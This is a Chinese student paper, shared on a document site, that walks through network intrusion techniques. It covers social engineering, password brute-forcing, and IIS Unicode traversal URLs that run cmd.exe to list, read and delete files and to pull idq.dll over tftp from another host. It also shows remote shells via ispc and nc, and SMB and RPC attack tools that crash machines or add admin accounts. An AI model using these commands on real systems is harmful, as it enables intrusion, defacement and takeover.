网络入侵手段与网络入侵技术论文设计.docx

上传人:b****7 文档编号:16306397 上传时间:2023-07-12 格式:DOCX 页数:23 大小:855.46KB
下载 相关 举报
网络入侵手段与网络入侵技术论文设计.docx_第1页
第1页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第2页
第2页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第3页
第3页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第4页
第4页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第5页
第5页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第6页
第6页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第7页
第7页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第8页
第8页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第9页
第9页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第10页
第10页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第11页
第11页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第12页
第12页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第13页
第13页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第14页
第14页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第15页
第15页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第16页
第16页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第17页
第17页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第18页
第18页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第19页
第19页 / 共23页
网络入侵手段与网络入侵技术论文设计.docx_第20页
第20页 / 共23页
亲,该文档总共23页,到这儿已超出免费预览范围,如果喜欢就下载吧!
下载资源
资源描述

网络入侵手段与网络入侵技术论文设计.docx

《网络入侵手段与网络入侵技术论文设计.docx》由会员分享,可在线阅读,更多相关《网络入侵手段与网络入侵技术论文设计.docx(23页珍藏版)》请在冰点文库上搜索。

网络入侵手段与网络入侵技术论文设计.docx

网络入侵手段与网络入侵技术论文设计

哈尔滨远东理工学院

网络入侵手段与网络入侵技术

 

姓名:

崔冬伟

专  业:

13级计算机网络技术

学号:

13520104

 

一、前言

目前,随着我国信息化进程的不断加快,计算机万回落已经广泛应用与政治、办公、经济、文化及社会生活的方方面面,网上办公,远程教育等技术手段早已成为现实。

正如任何新鲜事物都有正反两方面一样。

计算机网络在推动整个社会发展的同时也带来了计算机网络安全问题,例如入侵和病毒等。

其实入侵给计算机网络带来的是目的性更强的破坏。

目前仅仅在互联网上就有20多万个黑客网站。

这些站点都介绍了一些攻击方法和攻击软件的使用以及系统的一些漏洞。

每天都有一大批新的黑客产生,除了好奇的少年网民,还有别有居心的人。

但现在还缺乏针对网络犯罪卓有成效的反击和跟踪手段,黑客攻击很隐蔽,使系统遭受攻击的可能性变大了,这成为网络安全的主要威胁。

二、常用的网络攻击手段:

1.社会工程学攻击

2.物理攻击

3.暴力攻击

4.利用Unicode漏洞攻击

5.利用缓冲区溢出漏洞进行攻击等技术

三、网络攻击手段实现以及流行的攻击工具的使用以及部分工具的代码实现。

1.社会工程学攻击

社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。

举个例子:

一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。

利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。

目前社会工程学攻击主要包括两种方式:

打电话请求密码和伪造Email

(1)打电话请求密码

尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。

在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。

(2)伪造Email

使用telnet一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。

在这种情形下这些信息显得是绝对的真实。

黑客可以伪造这些。

一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。

2.物理攻击

(1)得到管理员密码

用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:

“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,

使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。

将FindPass.exe拷贝到C盘根目录,执行该程序,将得到当前用户得登录名,

(2)权限提升

有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。

其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。

(3)普通用户建立管理员帐号

利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,

输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,

3.暴力攻击

暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码。

一个黑客需要破解—段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。

(1)字典文件

一次字典攻击能否成功,很大因素上决定与字典文件。

一个好的字典文件可以高效快速的得到系统的密码。

攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。

一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个可能的密码。

目前有很多工具软件专门来创建字典文件,图5-8是一个简单的字典文件。

(2)暴力破解操作系统密码

字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示

(3)暴力破解操作系统密码

比如使用下图所示的字典文件,利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来,

(4)暴力破解邮箱密码

邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。

尤其七位全部是数字,更容易被破解。

破解电子邮箱密码,一个比较著名的工具软件是:

黑雨——POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,

(5)暴力破解软件密码

目前许多软件都具有加密的功能,比如Office文档、Winzip文档和Winrar文档等等。

这些文档密码可以有效的防止文档被他人使用和阅读。

但是如果密码位数不够长的话,同样容易被破解。

①Office文档暴力破解

②修改权限密码

对话框中选择选项卡“安全性”,在打开权限密码和修改权限密码的两个文本框中都输入“999”,

保存并关闭该文档,然后再打开,就需要输入密码了

③破解Word文档密码

密码是三位的,使用工具软件,AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码,主界面如图

点击工具栏按钮“OpenFile”,打开刚才建立的Word文档,程序打开成功后会在LogWindow中显示成功打开的消息

设置密码长度最短是一位,最长是三位,点击工具栏开始的图标,开始破解密码,大约两秒钟后,密码被破解了

4.Unicode漏洞专题

通过打操作系统的补丁程序,就可以消除漏洞。

只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。

Unicode漏洞是2000-10-17发布的,受影响的版本:

MicrosoftIIS5.0+MicrosoftWindows2000系列版本

MicrosoftIIS4.0+MicrosoftWindowsNT4.0

消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。

微软IIS4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"目录遍历的漏洞。

使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:

172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如下图

将主机添加到目标地址,扫描结果如下图

可以看出,存在许多系统的漏洞。

只要是/scripts开头的漏洞都是Unicode漏洞。

比如:

/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir

其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如下图

scripts目录一般系统盘根目录下的Inetpub目录下,如图

在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。

浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。

比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir”中的“%c0%2f”就是“/”的Unicode编码。

这条语句是执行dir命令列出目录结构。

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。

在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。

但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。

%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af

利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入

“http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir+c:

\”

(1)利用Unicode漏洞读取系统盘目录

利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。

使用的语句是:

http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+type+c:

\boot.ini

执行的结果如图

(2)利用Unicode漏洞删除主页

利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:

\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。

使用的语句是:

http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+del+c:

\inetpub\wwwroot\default.asp

(3)拷贝文件

为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:

http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+copy+C:

\winnt\system32\cmd.exe+c.exe

程序执行结果如图

(4)查看C盘的目录

以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:

http:

//172.18.25.109/scripts/c.exe?

/c+dir+c:

\

执行的结果如图

(5)利用Unicode漏洞入侵系统

在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。

利用Unicode可以入侵对方的系统,并得到管理员权限。

首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。

需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(TextFileTransmissionProtocol)一般用来传输单个文件。

使用工具软件tftpd32.exe建立服务器。

将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图

这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。

在浏览器中执行命令:

“http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+tftp+-i+172.18.25.110+get+idq.dll”

命令其实是“tftp–i172.18.25.110getidq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,执行成功的界面如图

(6)上载文件

(7)查看scripts目录

传完毕后可以查看一下scripts目录,是否真的上传成功了。

如图

(8)入侵对方主机

说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。

拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:

“ispc.exe172.18.25.109/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程如图

(9)建立用户

可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图

(10)其他漏洞攻击

①利用打印漏洞

利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。

经过测试,该漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。

使用工具软件:

cniis.exe,使用的语法格式是:

“cniis172.18.25.1090”,第一个参数是目标的IP地址,第二参数是目标操作系统的补丁号,因为172.18.25.109没有打补丁,这里就是0。

拷贝cniis.exe文件到C盘根目录,执行程序如图

②SMB致命攻击

SMB(SessionMessageBlock,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。

SMB协议版本有很多种,在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。

利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。

下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。

③致命攻击

使用的工具软件是:

SMBDieV1.0,该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁,软件的主界面如图

然后再点按钮“Kill”,如果参数输入没有错误的话,对方计算机立刻重启或蓝屏,命中率几乎100%,被攻击的计算机蓝屏界面如图

5.利用缓冲区溢出漏洞进行攻击等技术

(1)缓冲区溢出攻击

目前最流行的一种攻击技术就是缓冲区溢出攻击。

当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。

这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果使在系统上产生一个后门。

这项攻击对技术要求比较高,但是攻击的过程却非常简单。

缓冲区溢出原理很简单,比如程序:

voidfunction(char*szPara1)

{

charbuff[16];

strcpy(buffer,szPara1);

}

程序中利用strcpy函数将szPara1中的内容拷贝到buff中,只要szPara1的长度大于16,就会造成缓冲区溢出。

存在strcpy函数这样问题的C语言函数还有:

strcat()、gets()、scanf()等。

1RPC漏洞溢出

远程过程调用RPC(RemoteProcedureCall),是操作系统的一种消息传递功能,允许应用程序呼叫网络上的计算机。

当系统启动的时候,自动加载RPC服务。

可以在服务列表中看到系统的RPC服务,如图

②利用RPC漏洞建立超级用户

RPC溢出漏洞,对SP4也适用,必须打专用补丁。

利用工具scanms.exe文件检测RPC漏洞,该工具是ISS安全公司2003年7月30日发布的,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOMRPC接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。

如果没有安装补丁程序,该IP地址就会显示出“[VULN]”。

首先拷贝该文件到C盘根目录,现在要检查地址段172.18.25.109到172.18.25.110的主机,执行命令“scanms.exe172.18.25.109-172.18.25.110”,检查过程如图

利用工具软件attack.exe对172.18.25.109进行攻击。

攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。

新建用户的用户名和密码都是qing10,这样就可以登录对方计算机了,RPC服务停止操作系统将有许多功能不能使用,非常容易被管理员发现,使用工具软件OpenRpcSs.exe来给对方重启RPC服务。

攻击的全过程如图

攻击全过程

2利用IIS溢出进行攻击

用IIS溢出入侵系统

利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口,工具软件的主界面如图

该软件适用于各种类型的操作系统,比如对172.18.25.109进行攻击,172.18.25.109的操作系统的Windows2000,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dirc:

\”设置如图

点击按钮“IDQ溢出”,出现攻击成功的提示框,如图

这个时候,813端口已经开放,利用工具软件nc.exe连接到该端口,将会自动执行改才发送的DOS命令“dirc:

\”,使用的语法是:

nc.exe-vv172.18.25.109813,其中-vv是程序的参数,813是目标端口。

可以看到命令的执行结果,如图

4、结束语

计算机网络信息安全是一项复杂的系统工程,防御网络入侵与攻击只是保障网络信息安全的一部分。

随着计算机网络的快速应用和普及,网络信息安全的不确定因素也越来越多,我们必须综合考虑各种安全因素,认真分析各种可能的入侵和攻击形式,采取有效的技术措施,制定合理的网络安全策略和配套的管理办法,防止各种可能的入侵和攻击行为,避免因入侵和攻击造成的各种损失。

 

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 人文社科 > 法律资料

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2